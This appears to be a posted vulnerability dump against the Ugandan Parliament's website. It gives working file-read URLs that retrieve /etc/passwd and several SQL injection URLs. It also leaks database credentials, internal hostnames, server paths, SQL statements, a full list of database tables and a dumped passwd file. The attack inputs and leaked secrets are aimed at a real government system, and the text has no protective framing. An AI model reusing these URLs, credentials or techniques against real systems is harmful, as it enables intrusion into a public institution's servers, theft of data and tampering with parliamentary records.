http://www.parliament.go.ug | remote file read/download - System compromise

__________________________________________________________________
oracle, mysql, hacluster, open-xchange

TNS for Linux: Version 11.1.0.6.0 - Production-Oracle Database 11g Enterprise Edition Release 11.1.0.6.0 - 64bit Production

There are too many and mixed up scripting languages and messed up *solutions*.



Read quite any file
http://www.parliament.go.ug/mpdata/mps.hei?$debug=pp&$file=/etc/passwd

SEVERAL possible sql injections (there are too many of them ...)
http://www.parliament.go.ug/mpdata/members.hei?committeeno=2%277&name=Committee+on+Rules%2c+Discipline+and+Privileges
http://www.parliament.go.ug/mpdata/mps.hei?p=f&n=t&details=t&j=632.000000&const=Woman+Representative&dist_id=65.000000&distname=Kanungu
http://www.parliament.go.ug/hansard/hans_text.jsp?srch_txt=hansards&exact=ALL&B1=Submit
http://www.parliament.go.ug/enewsletter/index.php/login


the errors are so kind to give those informations:
host: `localhost'
user: `mpdata'
database name: `tenG'
Statement: SELECT INITCAP(districtname) as distname FROM tbldistrict WHERE districtno=65.000000'


SELECT * FROM tbluser WHERE username 


SELECT mp.mpno as m_id, INITCAP(D.districtname) districtname,d.districtno, INITCAP(C.constituencyname) constituencyname,P.partyname,tblMPmembership.Membershipname, MPC.membershipno, MP.titleid as title, INITCAP(MP.surname) as fname, INITCAP(MP.othernames) as onames , MP.contact_email as email FROM tblmpcommittee MPC, tblmp M ,tblmpname MP, tblMPmembership,tblconstituency C,tblparty P,tblDistrict D WHERE MPC.committeeno=27 AND MPC.MPID=M.MPID AND M.MPNO=MP.MPNO and tblMPmembership.membershipno=MPC.membershipno and M.constituencyno=C.constituencyno and M.partyno=P.partyno and D.districtno=C.districtno and MPC.comstatus=1 and M.mpstatusno=1 ORDER BY membershipno ASC, fname ASC


db name: TENG.PARLIAMENT.GO.UG


-internal server??
http://jwabwire.parliament.go.ug:7778/pls/mp/display_image?mp_id=1

http://www.parliament.go.ug/mpdata/mps.hei?$debug=pp&$file=%2fusr%2flocal%2fhttpd%2fhtdocs%2fmpdata%2fmps.hei&$line=131&$column=41#here
http://localhost:8080/pass.asp?mpid=

http://www.parliament.go.ug/mpdata/pass.asp

C:\ICT Invetory\xx.mdb

Data source = UG;User ID=mpdata;password=mpdata

-Paths

/usr/local/httpd/htdocs/mpdata/lib
/usr/local/httpd/htdocs/layout
/usr/local/httpd/htdocs/heitml2.0/lib
/home/bbaale/public_html/advocates





This page is related to the billings for the nation. I don't know what are the consequences for the ugandese goverment if someone manages such data. Anybody can mix it up for personal interests or for (bad) political motivations.
http://www.parliament.go.ug/billtrack/



Some NON confidential data extracted from tbldistrict
Buikwe District
Bukomansimbi District
Butambala District
Buvuma District
Gomba District
Kalungu District
Kyankwanzi District
Lwengo District
Amudat District
Bulambuli District
Buyende District
Kibuku District
Kween District
Luuka District
Namayingo District
Ngora District
Serere District
Napak District
Buhweju District
Kiryadongo District
Mitooma District
Ntoroko District
Sheema District
Kyegegwa District
Rubirizi District
Agago District
Alebtong District
Kole District
Lamwo District
Nwoya District
Otuke District
Zombo District
Abim District
Amuru District
Budaka District
Buliisa District
Maracha District
Namutumba District
Oyam District
Bukedea District
Dokolo District
Lyantonde District
Bududa District
Kalangala District
Kampala District
Kiboga District
Luwero District
Masaka District
Mpigi District
Mubende District
Mukono District
Nakasongola District
Rakai District
Ssembabule District
Kayunga District
Wakiso District
Nakaseke District
Mityana District
Bugiri District
Busia District
Iganga District
Jinja District
Kamuli District
Kapchorwa District
Katakwi District
Kumi District
Mbale District
Pallisa District
Soroti District
Tororo District
Kaberamaido District
Mayuge District
Sironko District
Butaleja District
Kaliro District
Amuria District
Manafwa District
Bukwo District
Adjumani District
Apac District
Arua District
Gulu District
Kitgum District
Kotido District
Lira District
Moroto District
Moyo District
Nebbi District
Nakapiripirit District
Pader District
Yumbe District
Kaabong District
Koboko District
Amolatar District
Bundibugyo District
Bushenyi District
Hoima District
Kabale District
Kabarole District
Kasese District
Kibaale District
Kisoro District
Masindi District
Mbarara District
Ntungamo District
Rukungiri District
Kamwenge District
Kanungu District
Kyenjojo District
Ibanda District
Isingiro District
Kiruhura District
Ex-Officio District
Youth District
Pwd District
Updf District
Workers District


-TABLES-
QUEST_COM_PRODUCTS
QUEST_COM_PRODUCTS_USED_BY
QUEST_COM_PRODUCT_PRIVS
QUEST_COM_USERS
QUEST_COM_USER_PRIVILEGES
TOAD_DATA_FILES
TOAD_FILESTAT
TOAD_FREE_SPACE
TOAD_REF
TOAD_TABLESPACES
TBLCOMMITTEE
TBLCOMMITTEETYPE
TBLCONSTITUENCY
TBLCONSTITUENCYPROFILE
TBLDISTRICT
TBLHANSARD
TBLITEM
TBLMARITALSTATUS_OLD
TBLMP
TBLMPCOMMITTEE
TBLMPMEMBERSHIP
TBLMPNAME_ORIGINAL
TBLMPSTATUS
TBLORDER
TBLORDERPAPER
TBLPARLIAMENT
TBLPARTY
TBLSEX
TBLSUBCOUNTY
TBLSUBITEM
TBLTELECOMM
TBLTELEDEPT
TBLTELENAME
TBLTELENAMES
TBLTELESTAFF
TBLUSER
TESTER
TESTER2
PGA_FORMS
PGA_LAYOUT
PGA_QUERIES
PGA_REPORTS
PGA_SCHEMA
PGA_SCRIPTS
RADDETAIL
TRANSFER_DETAILS
DISTRICT
EAS_VERSION
SR_SUB_TYPE
SUB_TAB_VIEWS
SR_SUB_TAB
COMPUTER
COMPUTER_ATTRIBUTES
VERSION
ACCOUNT
SCHEDULE_TASK
COMPUTER_CHANGES
COMPUTER_GROUP
COMPUTER_LISTS
COMPUTER_LOG
COMPUTER_USERS
EVENT
LOGIN_LOG
MESSAGES
PROBLEM_TYPE
SR_SUB_TAB_HISTORY
SERVICE_REQ
SERVICE_REQ_HISTORY
SYSAID_USER
SYSAID_USER_HISTORY
AUDIT_LOG
CI_FILES
CI_LINKS
CI_TEMPLATE_LINKS
QUICK_LIST
ASSET_CATALOG_FILES
SUPPLIER_FILES
SYSAID_USER_FILES
COMPANY_FILES
SERVICE_REQ_LINKS
SR_TAB_DEPENDENCES
COMPUTER_HISTORY
COMPUTER_ATTRIBUTES_HISTORY
COMPUTER_FILES
SOFTWARE_FILES
COMPUTER_LINKS
SYSAID_USER_ROUTING
CI_ATTRIBUTES
PROCESSES_DAY_DATA
PROCESSES_WEEK_DATA
PROCESSES_MONTH_DATA
PROCESSES_YEAR_DATA
PERFORMANCE_DAY_DATA
PERFORMANCE_WEEK_DATA
PERFORMANCE_MONTH_DATA
PERFORMANCE_YEAR_DATA
COMP_UPDATE_DAY_DATA
COMP_UPDATE_WEEK_DATA
CI_HISTORY
LIST_VIEW
SERVICE_REQ_LOG
USER2ASSET
SERVICE_REQ_DATA
SOFTWARE
SOFTWARE2INSTALL_NAME
ASSET_CATALOG
SUPPLIER
FAQ
URL_MONTH_DATA
URL_YEAR_DATA
URL_EMBED_DATA
MONITOR_EVENTS
PREDEFINED_SERVICES_CHECK
PREDEFINED_NETWORK_CHECK
NEWS
SATISFACTION_SURVEY
COMP_UPDATE_MONTH_DATA
COMP_UPDATE_YEAR_DATA
NETWORK_DAY_DATA
NETWORK_WEEK_DATA
NETWORK_MONTH_DATA
NETWORK_YEAR_DATA
ASSET_DATA_DAY_DATA
ASSET_DATA_WEEK_DATA
ASSET_DATA_MONTH_DATA
ASSET_DATA_YEAR_DATA
NETWORK_ACTIVITY_DAY_DATA
NETWORK_ACTIVITY_WEEK_DATA
NETWORK_ACTIVITY_MONTH_DATA
NETWORK_ACTIVITY_YEAR_DATA
CUSTOMIZED_DAY_DATA
CUSTOMIZED_WEEK_DATA
CUSTOMIZED_MONTH_DATA
CUSTOMIZED_YEAR_DATA
URL_DAY_DATA
URL_WEEK_DATA
SERVICE_REQ_MSG
COMMANDS
USER_GROUPS
USER2GROUP
PROJECT
PROJECT_HISTORY
PROJECT_LOG
TASK_HISTORY
TASK_LOG
TASK_USERS
TASK_ACTIVITIES
TASK_FILES
ASSET_TYPES
COMPANY
CI_TYPE
CI_SUB_TYPE
CI_RELATION
CI_RELATION_TYPE
CI_TEMPLATE
MONITOR_TEMPLATES
MONITORING_CONF
MONITOR_EMBED_DATA
SERVICES_DAY_DATA
SERVICES_WEEK_DATA
SERVICES_MONTH_DATA
SERVICES_YEAR_DATA
TBLMPNAME
TBLMPCONST
TBLMPNAME2
SURVEY_QUESTIONS
SURVEY_ANSWERS
CURRENT_MEASUREMENT_LISTS
LAST_RUN_MEASUREMENT_LISTS
CURRENT_SLA_RESULTS
CUSTOM_TRIGGERS
SYSAID_EVENTS
TRAPS_DATA
FORM_HISTORY
USS_SECURITY_QUESTIONS
USS_NOTIF_EVENTS
ONLINE_USERS_HISTORY
USER_QUESTIONS
USER_ANSWER_ATTEMPTS
SYSAID_USER_PUSH_ENABLE
SYSAID_USER_PUSH_NOTIFICATIONS
ONLINE_ASSETS
ASSET_OFFLINE_LOG
USERS_REMOTE_ASSETS
REMOTE_ACTIVE_SESSIONS
SYSAID_USER_PERMISSIONS
PRIORITY_MATRIX_CUST_VALUES
CUSTOM_SERVICES
MDM_POLICY
MDM_WIFI_POLICY
MDM_ACTIONS
UI_MENUS
UI_MENUS2GROUP
QRTZ_JOB_DETAILS
QRTZ_JOB_LISTENERS
QRTZ_TRIGGERS
QRTZ_SIMPLE_TRIGGERS
QRTZ_CRON_TRIGGERS
QRTZ_BLOB_TRIGGERS
QRTZ_TRIGGER_LISTENERS
QRTZ_CALENDARS
QRTZ_PAUSED_TRIGGER_GRPS
QRTZ_FIRED_TRIGGERS
QRTZ_SCHEDULER_STATE
QRTZ_LOCKS
COMPANY_LINKS
ASSET_CATALOG_HISTORY
SOFTWARE_HISTORY
SUPPLIER_HISTORY
SR_SUB_TAB_FILES
SR_SUB_TAB_LINKS
LINKED_SERVICE_REQ
SYSAID_ITEM_LINKS
PROJECT_LINKS
TASK_LINKS
ASSET_CATALOG_LINKS
SOFTWARE_LINKS
SUPPLIER_LINKS
SYSAID_USER_LINKS
WORK_REPORT
CUST_VALUES
SORT_CUST_VALUES
SR_SUB_TAB_POPULATE
ASSET_NOTIF_EVENTS
MEASUREMENTS_LISTS
MEASUREMENTS_LISTS_HISTORY
MEASUREMENTS_DEF
MEASUREMENTS_DEF_HISTORY
AGREEMENT
CUSTOM_COLUMNS
ONLINE_USERS
TBLMPNAME_ORIG_MODIFIED
FAQ_TAGS
SERVICE_REQ_FILES
TBLWORK
TBLTITLE
TBLRELIGION
TBLRELATION
TBLPROF_MEMBERSHIP
TBLPENSION
TBLOTHERINFO
TBLMPSNAME
TBLINSTITUTION
TBLEXTRACURRICULAR
TBLEDUCATIONLEVEL
TBLEDUCATION
TBLCONFERENCE
COMPANY_HISTORY
DISCOVERY_SERVICE
CUSTOMIZED_SNMP_OIDS
ASSET2CI
STATUS_SETTINGS
USER2CI
AUDIT_LOG_LINES
FAQ_FILES
REMINDERS
AUTOMATIC_TEXTS
USER_FAVORITES
CHAT_ACTIVE_SESSIONS
CHAT_CLOSED_SESSIONS
CHAT_QUEUE
CHAT_QUEUE_MESSAGES
SHARE_AND_COMPARE
STATISTICS_DATA
GENERIC_MESSAGES
MPTELEPHONE
PROJECT_USERS
PROJECT_FILES
TASK
TBLMARITALSTATUS


sample passwd
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
cyrus:x:96:12:User for cyrus-imapd:/usr/lib/cyrus:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
dhcpd:x:103:65534:DHCP server daemon:/var/lib/dhcp:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:50:113:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
geronimo:x:108:112:Geronimo:/usr/share/websphere-as_ce-1.1:/bin/sh
hacluster:x:90:90:heartbeat processes:/var/lib/heartbeat/cores/hacluster:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hal:/bin/false
ldap:x:76:70:User for OpenLDAP:/var/lib/ldap:/bin/bash
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
mailman:x:72:67:GNU mailing list manager:/var/lib/mailman:/bin/bash
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
mdom:x:28:28:Mailing list agent:/usr/lib/majordomo:/bin/bash
messagebus:x:100:101:User for D-BUS:/var/run/dbus:/bin/false
mysql:x:60:107:MySQL database admin:/var/lib/mysql:/bin/bash
nagios:x:107:111:User for Nagios:/var/lib/nagios:/bin/false
named:x:44:44:Name server daemon:/var/lib/named:/bin/bash
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:103:NTP daemon:/var/lib/ntp:/bin/false
open-xchange:x:111:115:open-xchange system user:/opt/open-xchange:/bin/false
oracle:x:105:108:Oracle user:/opt/oracle:/bin/bash
pop:x:67:100:POP admin:/var/lib/pop:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
quagga:x:104:106:Quagga routing daemon:/var/run/quagga:/bin/false
radiusd:x:109:114:Radius daemon:/var/lib/radiusd:/bin/false
root:x:0:0:root:/root:/bin/bash
snort:x:73:68:Snort network monitor:/var/lib/snort:/bin/bash
squid:x:31:65534:WWW-proxy squid:/var/cache/squid:/bin/csh
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:102:104:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
tomcat:x:106:110:Tomcat:/usr/share/tomcat5:/bin/sh
upsd:x:112:2:UPS daemon:/sbin:/bin/false
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
vscan:x:65:105:Vscan account:/var/spool/amavis:/bin/bash
websense_db_user:x:110:100::/OracleContentServer/Websense/bin:/sbin/nologin
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
bbaale:x:2196:100::/home/bbaale:/bin/bash
filter:x:500:500::/home/filter:/bin/false
itx:x:2195:100::/home/itx:/bin/bash
otrs:x:1749:8:OTRS System User:/opt/otrs:/bin/false
qtss:x:1690:100::/home/qtss:/bin/bash
spamd:x:1603:100::/home/spamd:/sbin/nologin
+::::::